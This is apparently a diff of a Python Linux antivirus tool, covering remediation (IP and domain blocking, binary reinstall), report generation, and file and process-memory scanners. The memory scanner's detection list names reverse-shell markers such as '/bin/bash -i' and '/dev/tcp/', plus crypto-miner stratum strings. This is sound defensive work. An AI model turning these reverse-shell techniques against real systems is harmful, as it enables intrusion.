logger.error("fix_ld_preload: %s", exc)
return action
# ------------------------------------------------------------------
# Network blocking
# ------------------------------------------------------------------
def block_ip(self, ip_address: str) -> RemediationAction:
"""Add an iptables DROP rule for *ip_address*."""
action = RemediationAction(
action="block_ip",
target=ip_address,
dry_run=self.dry_run,
)
cmd = ["iptables", "-A", "OUTPUT", "-d", ip_address, "-j", "DROP"]
action.details = f"Rule: {' '.join(cmd)}"
if self.dry_run:
action.success = True
return action
try:
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE, timeout=10)
action.success = True
logger.info("Blocked IP via iptables: %s", ip_address)
except (subprocess.CalledProcessError, FileNotFoundError, OSError) as exc:
action.details += f" — failed: {exc}"
logger.error("Failed to block IP %s: %s", ip_address, exc)
return action
def block_domain(self, domain: str) -> RemediationAction:
"""Redirect *domain* to 127.0.0.1 via ``/etc/hosts``."""
action = RemediationAction(
action="block_domain",
target=domain,
dry_run=self.dry_run,
)
hosts_path = Path("/etc/hosts")
entry = f"127.0.0.1 {domain} # blocked by ayn-antivirus"
action.details = f"Adding to /etc/hosts: {entry}"
if self.dry_run:
action.success = True
return action
try:
current = hosts_path.read_text()
if domain in current:
action.details = f"Domain {domain} already in /etc/hosts"
action.success = True
return action
with open(hosts_path, "a") as fh:
fh.write(f"\n{entry}\n")
action.success = True
logger.info("Blocked domain via /etc/hosts: %s", domain)
except OSError as exc:
action.details += f" — failed: {exc}"
logger.error("Failed to block domain %s: %s", domain, exc)
return action
# ------------------------------------------------------------------
# System binary restoration
# ------------------------------------------------------------------
def restore_system_binary(self, binary_path: str | Path) -> RemediationAction:
"""Reinstall the package owning *binary_path* using the system package manager."""
binary_path = Path(binary_path)
action = RemediationAction(
action="restore_system_binary",
target=str(binary_path),
dry_run=self.dry_run,
)
# Determine package manager and owning package.
pkg_name, pm_cmd = _find_owning_package(binary_path)
if not pkg_name:
action.details = f"Cannot determine owning package for {binary_path}"
return action
reinstall_cmd = pm_cmd + [pkg_name]
action.details = f"Reinstalling package '{pkg_name}': {' '.join(reinstall_cmd)}"
if self.dry_run:
action.success = True
return action
try:
subprocess.check_call(
reinstall_cmd, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE, timeout=120
)
action.success = True
logger.info("Restored %s via %s", binary_path, " ".join(reinstall_cmd))
except (subprocess.CalledProcessError, FileNotFoundError, OSError) as exc:
action.details += f" — failed: {exc}"
logger.error("Failed to restore %s: %s", binary_path, exc)
return action
# ------------------------------------------------------------------
# Internal helpers
# ------------------------------------------------------------------
def _publish(self, action: RemediationAction) -> None:
event_bus.publish(EventType.REMEDIATION_ACTION, {
"action": action.action,
"target": action.target,
"details": action.details,
"success": action.success,
"dry_run": action.dry_run,
})
# ---------------------------------------------------------------------------
# Package-manager helpers
# ---------------------------------------------------------------------------
def _find_owning_package(binary_path: Path) -> tuple:
"""Return ``(package_name, reinstall_command_prefix)`` or ``("", [])``."""
path_str = str(binary_path)
# dpkg (Debian/Ubuntu)
try:
out = subprocess.check_output(
["dpkg", "-S", path_str], stderr=subprocess.DEVNULL, timeout=10
).decode().strip()
pkg = out.split(":")[0]
return pkg, ["apt-get", "install", "--reinstall", "-y"]
except (subprocess.CalledProcessError, FileNotFoundError, OSError):
pass
# rpm (RHEL/CentOS/Fedora)
try:
out = subprocess.check_output(
["rpm", "-qf", path_str], stderr=subprocess.DEVNULL, timeout=10
).decode().strip()
if "not owned" not in out:
# Try dnf first, fall back to yum.
pm = "dnf" if shutil.which("dnf") else "yum"
return out, [pm, "reinstall", "-y"]
except (subprocess.CalledProcessError, FileNotFoundError, OSError):
pass
return "", []

View File

@@ -0,0 +1,535 @@
"""Report generator for AYN Antivirus.
Produces scan reports in plain-text, JSON, and HTML formats from
:class:`ScanResult` / :class:`FullScanResult` dataclasses.
"""
from __future__ import annotations
import html as html_mod
import json
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional, Union
from ayn_antivirus import __version__
from ayn_antivirus.core.engine import (
FullScanResult,
ScanResult,
ThreatInfo,
)
from ayn_antivirus.utils.helpers import format_duration, format_size, get_system_info
# Type alias for either result kind.
AnyResult = Union[ScanResult, FullScanResult]
class ReportGenerator:
"""Create scan reports in multiple output formats."""
# ------------------------------------------------------------------
# Plain text
# ------------------------------------------------------------------
@staticmethod
def generate_text(result: AnyResult) -> str:
"""Render a human-readable plain-text report."""
threats, meta = _extract(result)
lines: List[str] = []
lines.append("=" * 72)
lines.append(" AYN ANTIVIRUS — SCAN REPORT")
lines.append("=" * 72)
lines.append("")
lines.append(f" Generated : {datetime.utcnow().isoformat()}")
lines.append(f" Version : {__version__}")
lines.append(f" Scan ID : {meta.get('scan_id', 'N/A')}")
lines.append(f" Scan Type : {meta.get('scan_type', 'N/A')}")
lines.append(f" Duration : {format_duration(meta.get('duration', 0))}")
lines.append("")
# Summary.
sev_counts = _severity_counts(threats)
lines.append("-" * 72)
lines.append(" SUMMARY")
lines.append("-" * 72)
lines.append(f" Files scanned : {meta.get('files_scanned', 0)}")
lines.append(f" Files skipped : {meta.get('files_skipped', 0)}")
lines.append(f" Threats found : {len(threats)}")
lines.append(f" CRITICAL : {sev_counts.get('CRITICAL', 0)}")
lines.append(f" HIGH : {sev_counts.get('HIGH', 0)}")
lines.append(f" MEDIUM : {sev_counts.get('MEDIUM', 0)}")
lines.append(f" LOW : {sev_counts.get('LOW', 0)}")
lines.append("")
# Threat table.
if threats:
lines.append("-" * 72)
lines.append(" THREATS")
lines.append("-" * 72)
hdr = f" {'#':>3} {'Severity':<10} {'Threat Name':<30} {'File'}"
lines.append(hdr)
lines.append(" " + "-" * 68)
for idx, t in enumerate(threats, 1):
sev = _sev_str(t)
name = t.threat_name[:30]
fpath = t.path[:60]
lines.append(f" {idx:>3} {sev:<10} {name:<30} {fpath}")
lines.append("")
# System info.
try:
info = get_system_info()
lines.append("-" * 72)
lines.append(" SYSTEM INFORMATION")
lines.append("-" * 72)
lines.append(f" Hostname : {info['hostname']}")
lines.append(f" OS : {info['os_pretty']}")
lines.append(f" CPUs : {info['cpu_count']}")
lines.append(f" Memory : {info['memory_total_human']}")
lines.append(f" Uptime : {info['uptime_human']}")
lines.append("")
except Exception:
pass
lines.append("=" * 72)
lines.append(f" Report generated by AYN Antivirus v{__version__}")
lines.append("=" * 72)
return "\n".join(lines) + "\n"
# ------------------------------------------------------------------
# JSON
# ------------------------------------------------------------------
@staticmethod
def generate_json(result: AnyResult) -> str:
"""Render a machine-readable JSON report."""
threats, meta = _extract(result)
sev_counts = _severity_counts(threats)
try:
sys_info = get_system_info()
except Exception:
sys_info = {}
report: Dict[str, Any] = {
"generator": f"ayn-antivirus v{__version__}",
"generated_at": datetime.utcnow().isoformat(),
"scan": {
"scan_id": meta.get("scan_id"),
"scan_type": meta.get("scan_type"),
"start_time": meta.get("start_time"),
"end_time": meta.get("end_time"),
"duration_seconds": meta.get("duration"),
"files_scanned": meta.get("files_scanned", 0),
"files_skipped": meta.get("files_skipped", 0),
},
"summary": {
"total_threats": len(threats),
"by_severity": sev_counts,
},
"threats": [
{
"path": t.path,
"threat_name": t.threat_name,
"threat_type": t.threat_type.name if hasattr(t.threat_type, "name") else str(t.threat_type),
"severity": _sev_str(t),
"detector": t.detector_name,
"details": t.details,
"file_hash": t.file_hash,
"timestamp": t.timestamp.isoformat() if hasattr(t.timestamp, "isoformat") else str(t.timestamp),
}
for t in threats
],
"system": sys_info,
}
return json.dumps(report, indent=2, default=str)
# ------------------------------------------------------------------
# HTML
# ------------------------------------------------------------------
@staticmethod
def generate_html(result: AnyResult) -> str:
"""Render a professional HTML report with dark-theme CSS."""
threats, meta = _extract(result)
sev_counts = _severity_counts(threats)
now = datetime.utcnow()
esc = html_mod.escape
try:
sys_info = get_system_info()
except Exception:
sys_info = {}
total_threats = len(threats)
status_class = "clean" if total_threats == 0 else "infected"
# --- Build threat table rows ---
threat_rows = []
for idx, t in enumerate(threats, 1):
sev = _sev_str(t)
sev_lower = sev.lower()
ttype = t.threat_type.name if hasattr(t.threat_type, "name") else str(t.threat_type)
threat_rows.append(
f"<tr>"
f'<td class="idx">{idx}</td>'
f"<td>{esc(t.path)}</td>"
f"<td>{esc(t.threat_name)}</td>"
f"<td>{esc(ttype)}</td>"
f'<td><span class="badge badge-{sev_lower}">{sev}</span></td>'
f"<td>{esc(t.detector_name)}</td>"
f'<td class="hash">{esc(t.file_hash[:16])}{"" if len(t.file_hash) > 16 else ""}</td>'
f"</tr>"
)
threat_table = "\n".join(threat_rows) if threat_rows else (
'<tr><td colspan="7" class="empty">No threats detected ✅</td></tr>'
)
# --- System info rows ---
sys_rows = ""
if sys_info:
sys_rows = (
f"<tr><td>Hostname</td><td>{esc(str(sys_info.get('hostname', '')))}</td></tr>"
f"<tr><td>Operating System</td><td>{esc(str(sys_info.get('os_pretty', '')))}</td></tr>"
f"<tr><td>Architecture</td><td>{esc(str(sys_info.get('architecture', '')))}</td></tr>"
f"<tr><td>CPUs</td><td>{sys_info.get('cpu_count', '?')}</td></tr>"
f"<tr><td>Memory</td><td>{esc(str(sys_info.get('memory_total_human', '')))}"
f" ({sys_info.get('memory_percent', '?')}% used)</td></tr>"
f"<tr><td>Uptime</td><td>{esc(str(sys_info.get('uptime_human', '')))}</td></tr>"
)
html = f"""\
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>AYN Antivirus — Scan Report</title>
<style>
{_CSS}
</style>
</head>
<body>
<!-- Header -->
<header>
<div class="logo">⚔️ AYN ANTIVIRUS</div>
<div class="subtitle">Scan Report — {esc(now.strftime("%Y-%m-%d %H:%M:%S"))}</div>
</header>
<!-- Summary cards -->
<section class="cards">
<div class="card">
<div class="card-value">{meta.get("files_scanned", 0)}</div>
<div class="card-label">Files Scanned</div>
</div>
<div class="card card-{status_class}">
<div class="card-value">{total_threats}</div>
<div class="card-label">Threats Found</div>
</div>
<div class="card card-critical">
<div class="card-value">{sev_counts.get("CRITICAL", 0)}</div>
<div class="card-label">Critical</div>
</div>
<div class="card card-high">
<div class="card-value">{sev_counts.get("HIGH", 0)}</div>
<div class="card-label">High</div>
</div>
<div class="card card-medium">
<div class="card-value">{sev_counts.get("MEDIUM", 0)}</div>
<div class="card-label">Medium</div>
</div>
<div class="card card-low">
<div class="card-value">{sev_counts.get("LOW", 0)}</div>
<div class="card-label">Low</div>
</div>
</section>
<!-- Scan details -->
<section class="details">
<h2>Scan Details</h2>
<table class="info-table">
<tr><td>Scan ID</td><td>{esc(str(meta.get("scan_id", "N/A")))}</td></tr>
<tr><td>Scan Type</td><td>{esc(str(meta.get("scan_type", "N/A")))}</td></tr>
<tr><td>Duration</td><td>{esc(format_duration(meta.get("duration", 0)))}</td></tr>
<tr><td>Files Scanned</td><td>{meta.get("files_scanned", 0)}</td></tr>
<tr><td>Files Skipped</td><td>{meta.get("files_skipped", 0)}</td></tr>
</table>
</section>
<!-- Threat table -->
<section class="threats">
<h2>Threat Details</h2>
<table class="threat-table">
<thead>
<tr>
<th>#</th>
<th>File Path</th>
<th>Threat Name</th>
<th>Type</th>
<th>Severity</th>
<th>Detector</th>
<th>Hash</th>
</tr>
</thead>
<tbody>
{threat_table}
</tbody>
</table>
</section>
<!-- System info -->
<section class="system">
<h2>System Information</h2>
<table class="info-table">
{sys_rows}
</table>
</section>
<!-- Footer -->
<footer>
Generated by AYN Antivirus v{__version__} &mdash; {esc(now.isoformat())}
</footer>
</body>
</html>
"""
return html
# ------------------------------------------------------------------
# File output
# ------------------------------------------------------------------
@staticmethod
def save_report(content: str, filepath: str | Path) -> None:
"""Write *content* to *filepath*, creating parent dirs if needed."""
fp = Path(filepath)
fp.parent.mkdir(parents=True, exist_ok=True)
fp.write_text(content, encoding="utf-8")
# ---------------------------------------------------------------------------
# Internal helpers
# ---------------------------------------------------------------------------
def _extract(result: AnyResult) -> tuple:
"""Return ``(threats_list, meta_dict)`` from either result type."""
if isinstance(result, FullScanResult):
sr = result.file_scan
threats = list(sr.threats)
elif isinstance(result, ScanResult):
sr = result
threats = list(sr.threats)
else:
sr = result
threats = []
meta: Dict[str, Any] = {
"scan_id": getattr(sr, "scan_id", None),
"scan_type": sr.scan_type.value if hasattr(sr, "scan_type") else None,
"start_time": sr.start_time.isoformat() if hasattr(sr, "start_time") and sr.start_time else None,
"end_time": sr.end_time.isoformat() if hasattr(sr, "end_time") and sr.end_time else None,
"duration": sr.duration_seconds if hasattr(sr, "duration_seconds") else 0,
"files_scanned": getattr(sr, "files_scanned", 0),
"files_skipped": getattr(sr, "files_skipped", 0),
}
return threats, meta
def _sev_str(threat: ThreatInfo) -> str:
"""Return the severity as an uppercase string."""
sev = threat.severity
if hasattr(sev, "name"):
return sev.name
return str(sev).upper()
def _severity_counts(threats: List[ThreatInfo]) -> Dict[str, int]:
counts: Dict[str, int] = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0}
for t in threats:
key = _sev_str(t)
counts[key] = counts.get(key, 0) + 1
return counts
# ---------------------------------------------------------------------------
# Embedded CSS (dark theme)
# ---------------------------------------------------------------------------
_CSS = """\
:root {
--bg: #0f1117;
--surface: #1a1d27;
--border: #2a2d3a;
--text: #e0e0e0;
--text-dim: #8b8fa3;
--accent: #00bcd4;
--critical: #ff1744;
--high: #ff9100;
--medium: #ffea00;
--low: #00e676;
--clean: #00e676;
--infected: #ff1744;
}
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: 'Segoe UI', 'Inter', system-ui, -apple-system, sans-serif;
background: var(--bg);
color: var(--text);
line-height: 1.6;
padding: 0;
}
header {
background: linear-gradient(135deg, #1a1d27 0%, #0d1117 100%);
border-bottom: 2px solid var(--accent);
text-align: center;
padding: 2rem 1rem;
}
header .logo {
font-size: 2rem;
font-weight: 800;
color: var(--accent);
letter-spacing: 0.1em;
}
header .subtitle {
color: var(--text-dim);
font-size: 0.95rem;
margin-top: 0.3rem;
}
section {
max-width: 1200px;
margin: 2rem auto;
padding: 0 1.5rem;
}
h2 {
color: var(--accent);
font-size: 1.25rem;
margin-bottom: 1rem;
border-bottom: 1px solid var(--border);
padding-bottom: 0.4rem;
}
/* Summary cards */
.cards {
display: flex;
flex-wrap: wrap;
gap: 1rem;
max-width: 1200px;
margin: 2rem auto;
padding: 0 1.5rem;
}
.card {
flex: 1 1 140px;
background: var(--surface);
border: 1px solid var(--border);
border-radius: 8px;
padding: 1.2rem 1rem;
text-align: center;
}
.card-value {
font-size: 2rem;
font-weight: 700;
color: var(--text);
}
.card-label {
color: var(--text-dim);
font-size: 0.85rem;
margin-top: 0.2rem;
}
.card-clean .card-value { color: var(--clean); }
.card-infected .card-value { color: var(--infected); }
.card-critical .card-value { color: var(--critical); }
.card-high .card-value { color: var(--high); }
.card-medium .card-value { color: var(--medium); }
.card-low .card-value { color: var(--low); }
/* Tables */
table {
width: 100%;
border-collapse: collapse;
}
.info-table td {
padding: 0.5rem 0.75rem;
border-bottom: 1px solid var(--border);
}
.info-table td:first-child {
color: var(--text-dim);
width: 180px;
font-weight: 600;
}
.threat-table {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 8px;
overflow: hidden;
}
.threat-table thead th {
background: #12141c;
color: var(--accent);
padding: 0.7rem 0.75rem;
text-align: left;
font-size: 0.85rem;
text-transform: uppercase;
letter-spacing: 0.05em;
}
.threat-table tbody td {
padding: 0.6rem 0.75rem;
border-bottom: 1px solid var(--border);
font-size: 0.9rem;
word-break: break-all;
}
.threat-table tbody tr:hover {
background: rgba(0, 188, 212, 0.06);
}
.threat-table .idx { color: var(--text-dim); width: 40px; }
.threat-table .hash { font-family: monospace; color: var(--text-dim); font-size: 0.8rem; }
.threat-table .empty { text-align: center; color: var(--clean); padding: 2rem; font-size: 1.1rem; }
/* Severity badges */
.badge {
display: inline-block;
padding: 0.15rem 0.6rem;
border-radius: 4px;
font-size: 0.78rem;
font-weight: 700;
text-transform: uppercase;
letter-spacing: 0.04em;
}
.badge-critical { background: rgba(255,23,68,0.15); color: var(--critical); border: 1px solid var(--critical); }
.badge-high { background: rgba(255,145,0,0.15); color: var(--high); border: 1px solid var(--high); }
.badge-medium { background: rgba(255,234,0,0.12); color: var(--medium); border: 1px solid var(--medium); }
.badge-low { background: rgba(0,230,118,0.12); color: var(--low); border: 1px solid var(--low); }
/* Footer */
footer {
text-align: center;
color: var(--text-dim);
font-size: 0.8rem;
padding: 2rem 1rem;
border-top: 1px solid var(--border);
margin-top: 3rem;
}
/* System info */
.system { margin-bottom: 2rem; }
"""

View File

@@ -0,0 +1,17 @@
"""AYN Antivirus scanner modules."""
from ayn_antivirus.scanners.base import BaseScanner
from ayn_antivirus.scanners.container_scanner import ContainerScanner
from ayn_antivirus.scanners.file_scanner import FileScanner
from ayn_antivirus.scanners.memory_scanner import MemoryScanner
from ayn_antivirus.scanners.network_scanner import NetworkScanner
from ayn_antivirus.scanners.process_scanner import ProcessScanner
__all__ = [
"BaseScanner",
"ContainerScanner",
"FileScanner",
"MemoryScanner",
"NetworkScanner",
"ProcessScanner",
]

View File

@@ -0,0 +1,58 @@
"""Abstract base class for all AYN scanners."""
from __future__ import annotations
import logging
from abc import ABC, abstractmethod
from typing import Any
logger = logging.getLogger(__name__)
class BaseScanner(ABC):
"""Common interface that every scanner module must implement.
Subclasses provide a ``scan`` method whose *target* argument type varies
by scanner (a file path, a PID, a network connection, etc.).
"""
# ------------------------------------------------------------------
# Identity
# ------------------------------------------------------------------
@property
@abstractmethod
def name(self) -> str:
"""Short, machine-friendly scanner identifier (e.g. ``"file_scanner"``)."""
...
@property
@abstractmethod
def description(self) -> str:
"""Human-readable one-liner describing what this scanner does."""
...
# ------------------------------------------------------------------
# Scanning
# ------------------------------------------------------------------
@abstractmethod
def scan(self, target: Any) -> Any:
"""Run the scanner against *target* and return a result object.
The concrete return type is defined by each subclass.
"""
...
# ------------------------------------------------------------------
# Helpers available to all subclasses
# ------------------------------------------------------------------
def _log_info(self, msg: str, *args: Any) -> None:
logger.info("[%s] " + msg, self.name, *args)
def _log_warning(self, msg: str, *args: Any) -> None:
logger.warning("[%s] " + msg, self.name, *args)
def _log_error(self, msg: str, *args: Any) -> None:
logger.error("[%s] " + msg, self.name, *args)

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,258 @@
"""File-system scanner for AYN Antivirus.
Walks directories, gathers file metadata, hashes files, and classifies
them by type (ELF binary, script, suspicious extension) so that downstream
detectors can focus on high-value targets.
"""
from __future__ import annotations
import grp
import logging
import os
import pwd
import stat
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, Generator, List, Optional
from ayn_antivirus.constants import (
MAX_FILE_SIZE,
SUSPICIOUS_EXTENSIONS,
)
from ayn_antivirus.scanners.base import BaseScanner
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Well-known magic bytes
# ---------------------------------------------------------------------------
_ELF_MAGIC = b"\x7fELF"
_SCRIPT_SHEBANGS = (b"#!", b"#!/")
_PE_MAGIC = b"MZ"
class FileScanner(BaseScanner):
"""Enumerates, classifies, and hashes files on disk.
This scanner does **not** perform threat detection itself — it prepares
the metadata that detectors (YARA, hash-lookup, heuristic) consume.
Parameters
----------
max_file_size:
Skip files larger than this (bytes). Defaults to
:pydata:`constants.MAX_FILE_SIZE`.
"""
def __init__(self, max_file_size: int = MAX_FILE_SIZE) -> None:
self.max_file_size = max_file_size
# ------------------------------------------------------------------
# BaseScanner interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "file_scanner"
@property
def description(self) -> str:
return "Enumerates and classifies files on disk"
def scan(self, target: Any) -> Dict[str, Any]:
"""Scan a single file and return its metadata + hash.
Parameters
----------
target:
A path (``str`` or ``Path``) to the file.
Returns
-------
dict
Keys: ``path``, ``size``, ``hash``, ``is_elf``, ``is_script``,
``suspicious_ext``, ``info``, ``header``, ``error``.
"""
filepath = Path(target)
result: Dict[str, Any] = {
"path": str(filepath),
"size": 0,
"hash": "",
"is_elf": False,
"is_script": False,
"suspicious_ext": False,
"info": {},
"header": b"",
"error": None,
}
try:
info = self.get_file_info(filepath)
result["info"] = info
result["size"] = info.get("size", 0)
except OSError as exc:
result["error"] = str(exc)
return result
if result["size"] > self.max_file_size:
result["error"] = f"Exceeds max size ({result['size']} > {self.max_file_size})"
return result
try:
result["hash"] = self.compute_hash(filepath)
except OSError as exc:
result["error"] = f"Hash failed: {exc}"
return result
try:
result["header"] = self.read_file_header(filepath)
except OSError:
pass # non-fatal
result["is_elf"] = self.is_elf_binary(filepath)
result["is_script"] = self.is_script(filepath)
result["suspicious_ext"] = self.is_suspicious_extension(filepath)
return result
# ------------------------------------------------------------------
# Directory walking
# ------------------------------------------------------------------
@staticmethod
def walk_directory(
path: str | Path,
recursive: bool = True,
exclude_patterns: Optional[List[str]] = None,
) -> Generator[Path, None, None]:
"""Yield every regular file under *path*.
Parameters
----------
path:
Root directory to walk.
recursive:
If ``False``, only yield files in the top-level directory.
exclude_patterns:
Path prefixes or glob-style patterns to skip. A file is skipped
if its absolute path starts with any pattern string.
"""
root = Path(path).resolve()
exclude = [str(Path(p).resolve()) for p in (exclude_patterns or [])]
if root.is_file():
yield root
return
iterator = root.rglob("*") if recursive else root.iterdir()
try:
for entry in iterator:
if not entry.is_file():
continue
entry_str = str(entry)
if any(entry_str.startswith(ex) for ex in exclude):
continue
yield entry
except PermissionError:
logger.warning("Permission denied walking: %s", root)
# ------------------------------------------------------------------
# File metadata
# ------------------------------------------------------------------
@staticmethod
def get_file_info(path: str | Path) -> Dict[str, Any]:
"""Return a metadata dict for the file at *path*.
Keys
----
size, permissions, permissions_octal, owner, group, modified_time,
created_time, is_symlink, is_suid, is_sgid.
Raises
------
OSError
If the file cannot be stat'd.
"""
p = Path(path)
st = p.stat()
mode = st.st_mode
# Owner / group — fall back gracefully on systems without the user.
try:
owner = pwd.getpwuid(st.st_uid).pw_name
except (KeyError, ImportError):
owner = str(st.st_uid)
try:
group = grp.getgrgid(st.st_gid).gr_name
except (KeyError, ImportError):
group = str(st.st_gid)
return {
"size": st.st_size,
"permissions": stat.filemode(mode),
"permissions_octal": oct(mode & 0o7777),
"owner": owner,
"group": group,
"modified_time": datetime.utcfromtimestamp(st.st_mtime).isoformat(),
"created_time": datetime.utcfromtimestamp(st.st_ctime).isoformat(),
"is_symlink": p.is_symlink(),
"is_suid": bool(mode & stat.S_ISUID),
"is_sgid": bool(mode & stat.S_ISGID),
}
# ------------------------------------------------------------------
# Hashing
# ------------------------------------------------------------------
@staticmethod
def compute_hash(path: str | Path, algorithm: str = "sha256") -> str:
"""Compute file hash. Delegates to canonical implementation."""
from ayn_antivirus.utils.helpers import hash_file
return hash_file(str(path), algo=algorithm)
# ------------------------------------------------------------------
# Header / magic number
# ------------------------------------------------------------------
@staticmethod
def read_file_header(path: str | Path, size: int = 8192) -> bytes:
"""Read the first *size* bytes of a file (for magic-number checks).
Raises
------
OSError
If the file cannot be opened.
"""
with open(path, "rb") as fh:
return fh.read(size)
# ------------------------------------------------------------------
# Type classification
# ------------------------------------------------------------------
@staticmethod
def is_elf_binary(path: str | Path) -> bool:
"""Return ``True`` if *path* begins with the ELF magic number."""
try:
with open(path, "rb") as fh:
return fh.read(4) == _ELF_MAGIC
except OSError:
return False
@staticmethod
def is_script(path: str | Path) -> bool:
"""Return ``True`` if *path* starts with a shebang (``#!``)."""
try:
with open(path, "rb") as fh:
head = fh.read(3)
return any(head.startswith(s) for s in _SCRIPT_SHEBANGS)
except OSError:
return False
@staticmethod
def is_suspicious_extension(path: str | Path) -> bool:
"""Return ``True`` if the file suffix is in :pydata:`SUSPICIOUS_EXTENSIONS`."""
return Path(path).suffix.lower() in SUSPICIOUS_EXTENSIONS

View File

@@ -0,0 +1,332 @@
"""Process memory scanner for AYN Antivirus.
Reads ``/proc/<pid>/maps`` and ``/proc/<pid>/mem`` on Linux to search for
injected code, suspicious byte patterns (mining pool URLs, known malware
strings), and anomalous RWX memory regions.
Most operations require **root** privileges. On non-Linux systems the
scanner gracefully returns empty results.
"""
from __future__ import annotations
import logging
import os
import re
from pathlib import Path
from typing import Any, Dict, List, Optional, Sequence
from ayn_antivirus.constants import CRYPTO_POOL_DOMAINS
from ayn_antivirus.scanners.base import BaseScanner
logger = logging.getLogger(__name__)
# Default byte-level patterns to search for in process memory.
_DEFAULT_PATTERNS: List[bytes] = [
# Mining pool URLs
*(domain.encode() for domain in CRYPTO_POOL_DOMAINS),
# Common miner stratum strings
b"stratum+tcp://",
b"stratum+ssl://",
b"stratum2+tcp://",
# Suspicious shell commands sometimes found in injected memory
b"/bin/sh -c",
b"/bin/bash -i",
b"/dev/tcp/",
# Known malware markers
b"PAYLOAD_START",
b"x86_64-linux-gnu",
b"ELF\x02\x01\x01",
]
# Size of chunks when reading /proc/<pid>/mem.
_MEM_READ_CHUNK = 65536
# Regex to parse a single line from /proc/<pid>/maps.
# address perms offset dev inode pathname
# 7f1c2a000000-7f1c2a021000 rw-p 00000000 00:00 0 [heap]
_MAPS_RE = re.compile(
r"^([0-9a-f]+)-([0-9a-f]+)\s+(r[w-][x-][ps-])\s+\S+\s+\S+\s+\d+\s*(.*)",
re.MULTILINE,
)
class MemoryScanner(BaseScanner):
"""Scan process memory for injected code and suspicious patterns.
.. note::
This scanner only works on Linux where ``/proc`` is available.
Operations on ``/proc/<pid>/mem`` typically require root or
``CAP_SYS_PTRACE``.
"""
# ------------------------------------------------------------------
# BaseScanner interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "memory_scanner"
@property
def description(self) -> str:
return "Scans process memory for injected code and malicious patterns"
def scan(self, target: Any) -> Dict[str, Any]:
"""Scan a single process by PID.
Parameters
----------
target:
The PID (``int``) of the process to inspect.
Returns
-------
dict
``pid``, ``rwx_regions``, ``pattern_matches``, ``strings_sample``,
``error``.
"""
pid = int(target)
result: Dict[str, Any] = {
"pid": pid,
"rwx_regions": [],
"pattern_matches": [],
"strings_sample": [],
"error": None,
}
if not Path("/proc").is_dir():
result["error"] = "Not a Linux system — /proc not available"
return result
try:
result["rwx_regions"] = self.find_injected_code(pid)
result["pattern_matches"] = self.scan_for_patterns(pid, _DEFAULT_PATTERNS)
result["strings_sample"] = self.get_memory_strings(pid, min_length=8)[:200]
except PermissionError:
result["error"] = f"Permission denied reading /proc/{pid}/mem (need root)"
except FileNotFoundError:
result["error"] = f"Process {pid} no longer exists"
except Exception as exc:
result["error"] = str(exc)
logger.exception("Error scanning memory for PID %d", pid)
return result
# ------------------------------------------------------------------
# /proc/<pid>/maps parsing
# ------------------------------------------------------------------
@staticmethod
def _read_maps(pid: int) -> List[Dict[str, Any]]:
"""Parse ``/proc/<pid>/maps`` and return a list of memory regions.
Each dict contains ``start`` (int), ``end`` (int), ``perms`` (str),
``pathname`` (str).
Raises
------
FileNotFoundError
If the process does not exist.
PermissionError
If the caller cannot read the maps file.
"""
maps_path = Path(f"/proc/{pid}/maps")
content = maps_path.read_text()
regions: List[Dict[str, Any]] = []
for match in _MAPS_RE.finditer(content):
regions.append({
"start": int(match.group(1), 16),
"end": int(match.group(2), 16),
"perms": match.group(3),
"pathname": match.group(4).strip(),
})
return regions
# ------------------------------------------------------------------
# Memory reading helper
# ------------------------------------------------------------------
@staticmethod
def _read_region(pid: int, start: int, end: int) -> bytes:
"""Read bytes from ``/proc/<pid>/mem`` between *start* and *end*.
Returns as many bytes as could be read; silently returns partial
data if parts of the region are not readable.
"""
mem_path = f"/proc/{pid}/mem"
data = bytearray()
try:
fd = os.open(mem_path, os.O_RDONLY)
try:
os.lseek(fd, start, os.SEEK_SET)
remaining = end - start
while remaining > 0:
chunk_size = min(_MEM_READ_CHUNK, remaining)
try:
chunk = os.read(fd, chunk_size)
except OSError:
break
if not chunk:
break
data.extend(chunk)
remaining -= len(chunk)
finally:
os.close(fd)
except OSError:
pass # region may be unmapped by the time we read
return bytes(data)
# ------------------------------------------------------------------
# Public scanning methods
# ------------------------------------------------------------------
def scan_process_memory(self, pid: int) -> List[Dict[str, Any]]:
"""Scan all readable regions of a process's address space.
Returns a list of dicts, one per region, containing ``start``,
``end``, ``perms``, ``pathname``, and a boolean ``has_suspicious``
flag set when default patterns are found.
Raises
------
PermissionError, FileNotFoundError
"""
regions = self._read_maps(pid)
results: List[Dict[str, Any]] = []
for region in regions:
# Only read regions that are at least readable.
if not region["perms"].startswith("r"):
continue
size = region["end"] - region["start"]
if size > 50 * 1024 * 1024:
continue # skip very large regions to avoid OOM
data = self._read_region(pid, region["start"], region["end"])
has_suspicious = any(pat in data for pat in _DEFAULT_PATTERNS)
results.append({
"start": hex(region["start"]),
"end": hex(region["end"]),
"perms": region["perms"],
"pathname": region["pathname"],
"size": size,
"has_suspicious": has_suspicious,
})
return results
def find_injected_code(self, pid: int) -> List[Dict[str, Any]]:
"""Find memory regions with **RWX** (read-write-execute) permissions.
Legitimate applications rarely need RWX regions. Their presence may
indicate code injection, JIT shellcode, or a packed/encrypted payload
that has been unpacked at runtime.
Returns a list of dicts with ``start``, ``end``, ``perms``,
``pathname``, ``size``.
"""
regions = self._read_maps(pid)
rwx: List[Dict[str, Any]] = []
for region in regions:
perms = region["perms"]
# RWX = positions: r(0) w(1) x(2)
if len(perms) >= 3 and perms[0] == "r" and perms[1] == "w" and perms[2] == "x":
size = region["end"] - region["start"]
rwx.append({
"start": hex(region["start"]),
"end": hex(region["end"]),
"perms": perms,
"pathname": region["pathname"],
"size": size,
"severity": "HIGH",
"reason": f"RWX region ({size} bytes) — possible code injection",
})
return rwx
def get_memory_strings(
self,
pid: int,
min_length: int = 6,
) -> List[str]:
"""Extract printable ASCII strings from readable memory regions.
Parameters
----------
min_length:
Minimum string length to keep.
